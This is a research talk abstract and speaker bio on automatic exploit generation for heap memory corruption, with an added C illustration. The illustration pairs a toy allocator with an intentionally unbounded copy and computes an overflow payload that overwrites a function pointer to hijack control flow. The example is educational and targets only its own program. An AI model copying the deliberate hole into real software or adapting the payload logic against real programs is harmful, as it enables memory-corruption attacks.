
Automatic Exploit Generation for Heap-based Vulnerabilities

Dusan Repel (Royal Holloway, University of London)

The automatic exploit generation problem is concerned with the construction of inputs that achieve arbitrary code execution in target applications. The raison d'être is to transition from organic to synthetic exploits by automating the exploit-writing pipeline.

Practical applications include making exploitation accessible to non-expert users, establishing bug severity by proving exploitability, and decreasing the level of human effort required in a time-critical environment.

In this work, we extend the automatic exploit generation paradigm to include heap-based memory corruption vulnerabilities. This requires reasoning about both the target application and the underlying dynamic memory allocator, since whether a heap corruption reaches a useful target depends on where the allocator places objects relative to each other.
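To make the last point concrete, the following is an added illustration written for this page; it is not code from the talk or from S2Lab. It invents a deterministic toy allocator (16-byte size header, payloads rounded to 16 bytes, bump allocation), a toy target in which an unbounded copy into a name buffer sits next to an object holding a function pointer, and a small "exploit generator" that derives the payload length from the allocator model rather than from the program alone. Change the allocator's rounding or header size and the generated input stops working, which is exactly why the allocator has to be part of the reasoning.

```c
/* Toy model of why heap exploit generation must reason about the allocator.
 * Added illustration only: the allocator, the vulnerable program and the
 * exploit generator below are all constructed for this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* --- Toy allocator: bump allocation, 16-byte header holding the payload
 *     size, payload rounded up to a multiple of 16. Deterministic on purpose
 *     so the layout can be computed ahead of time. --- */
#define ARENA_SIZE 4096
#define HDR 16
static _Alignas(16) unsigned char arena[ARENA_SIZE];
static size_t arena_top;

static size_t round16(size_t n) { return (n + 15) & ~(size_t)15; }

static void *toy_malloc(size_t n) {
    size_t payload = round16(n);
    if (arena_top + HDR + payload > ARENA_SIZE) return NULL;
    unsigned char *chunk = arena + arena_top;
    memcpy(chunk, &payload, sizeof payload);   /* header: payload size */
    arena_top += HDR + payload;
    return chunk + HDR;                        /* user pointer past header */
}

static void toy_reset(void) { arena_top = 0; memset(arena, 0, ARENA_SIZE); }

/* --- Toy target: a name buffer allocated just before a handler object whose
 *     first field is a function pointer. --- */
struct handler { void (*fn)(void); int id; };

static int hijacked;
static void benign(void) { }
static void win(void)    { hijacked = 1; }    /* stands in for attacker code */

/* The bug: length comes from the input, not from the buffer size. */
static void vulnerable_copy(char *dst, const unsigned char *src, size_t len) {
    memcpy(dst, src, len);
}

/* --- Exploit generation from the allocator model. The distance from the
 *     name buffer to handler->fn is the rounded name payload, plus the next
 *     chunk's header, plus the field offset inside the struct. --- */
static size_t distance_to_fn(size_t name_request) {
    return round16(name_request) + HDR + offsetof(struct handler, fn);
}

/* Build filler up to the pointer, then the replacement pointer bytes. */
static size_t build_exploit(size_t name_request, void (*target)(void),
                            unsigned char *out, size_t out_cap) {
    size_t dist = distance_to_fn(name_request);
    size_t len = dist + sizeof target;
    if (len > out_cap) return 0;
    memset(out, 'A', dist);
    memcpy(out + dist, &target, sizeof target);
    return len;
}

/* Run the synthetic exploit against the toy target; returns 1 on hijack. */
static int run_demo(void) {
    toy_reset();
    hijacked = 0;
    char *name = toy_malloc(20);               /* rounds up to 32 bytes */
    struct handler *h = toy_malloc(sizeof *h); /* lands right after it */
    h->fn = benign;
    h->id = 7;

    unsigned char input[256];
    size_t len = build_exploit(20, win, input, sizeof input);
    if (len == 0) return 0;

    vulnerable_copy(name, input, len);         /* overflows into h->fn */
    h->fn();                                   /* control flow reaches win */
    return hijacked;
}

int main(void) {
    printf("bytes from name buffer to handler->fn: %zu\n", distance_to_fn(20));
    printf("hijacked: %d\n", run_demo());
    return 0;
}
```

With a 20-byte request the generator computes 48 bytes of filler (32 rounded payload + 16 header + 0 field offset) before the pointer; against a real allocator the same computation would have to account for its actual header layout, size classes, and allocation order, which is the work the abstract refers to.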

Speaker bio

After receiving a BSc in Computer Science, Dusan joined the first generation of PhD research students at the Centre for Doctoral Training in Cyber Security at Royal Holloway, University of London.

He is currently working under the joint supervision of Johannes Kinder and Lorenzo Cavallaro at the Systems Security Lab (S2Lab), where he is investigating methods for automatic exploit generation.

He has recently presented at several security events, including the FMATS4 workshop on formal methods in Cambridge and the 3rd annual ACE-CSR conference in Solihull. Previously, he participated in Kaspersky academic competitions in Germany and the UK, where he presented work on polymorphic engines.
